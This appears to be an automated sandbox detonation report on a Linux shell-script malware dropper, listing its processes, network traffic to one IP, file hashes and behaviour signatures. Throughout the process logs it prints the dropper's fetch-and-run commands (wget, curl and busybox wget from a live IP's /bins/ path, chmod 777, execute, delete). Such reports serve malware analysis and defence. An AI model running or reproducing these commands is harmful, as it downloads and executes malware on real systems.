[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/chmod

[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM

[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/rm

[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/wget

[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/chmod

[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z

[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/rm

[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/wget

[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/chmod

[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ

[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/rm

[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/chmod

[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm

[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/rm

[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/wget

[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/chmod

[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6

[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/rm

[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/wget

[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/chmod

[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn

[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/rm

[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/wget

[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/chmod

[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM

[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/rm

[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/wget

[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/chmod

[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z

[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/rm

[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/wget

[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/chmod

[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ

[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/rm

[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/chmod

[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc

[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/rm

[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/wget

[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/chmod

[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD

[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/rm

[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/wget

[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/chmod

[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/rm

[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/wget

[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/chmod

[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs

[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/rm

[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/wget

[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/chmod

[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G

[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/rm

[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/wget

[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/chmod

[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/rm

[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/wget

[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/chmod

[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb

[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/rm

[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/wget

[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/chmod

[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe

[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/rm

[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 07:29

Reported

2024-11-21 07:31

Platform

debian9-mipsel-20240418-en

Max time kernel

61s

Max time network

64s

Command Line

[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls N/A
N/A /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs N/A
N/A /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs N/A
N/A /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G N/A
N/A /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb N/A
N/A /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe N/A
N/A /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm N/A
N/A /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 N/A
N/A /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc N/A
N/A /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD N/A
N/A /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn N/A
N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z N/A
N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm N/A
N/A /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 N/A
N/A /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn N/A
N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z N/A
N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc N/A
N/A /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD N/A
N/A /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs N/A
N/A /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs N/A
N/A /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G N/A
N/A /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls N/A
N/A /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb N/A
N/A /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /usr/bin/curl N/A
File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /usr/bin/curl N/A
File opened for modification /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /usr/bin/curl N/A
File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /usr/bin/curl N/A
File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /usr/bin/curl N/A
File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /usr/bin/curl N/A
File opened for modification /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /usr/bin/curl N/A
File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /usr/bin/curl N/A
File opened for modification /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /usr/bin/curl N/A
File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /usr/bin/curl N/A
File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /usr/bin/curl N/A
File opened for modification /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /usr/bin/curl N/A
File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /usr/bin/curl N/A
File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /usr/bin/curl N/A
File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /usr/bin/curl N/A
File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /usr/bin/curl N/A
File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /usr/bin/curl N/A
File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /usr/bin/curl N/A
File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /usr/bin/curl N/A
File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /usr/bin/curl N/A
File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /usr/bin/curl N/A
File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /usr/bin/curl N/A
File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /usr/bin/curl N/A
File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /usr/bin/curl N/A
File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /usr/bin/curl N/A
File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /usr/bin/curl N/A
File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /usr/bin/curl N/A
File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /usr/bin/curl N/A

Processes

/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh

[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/chmod

[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/rm

[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/wget

[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/curl

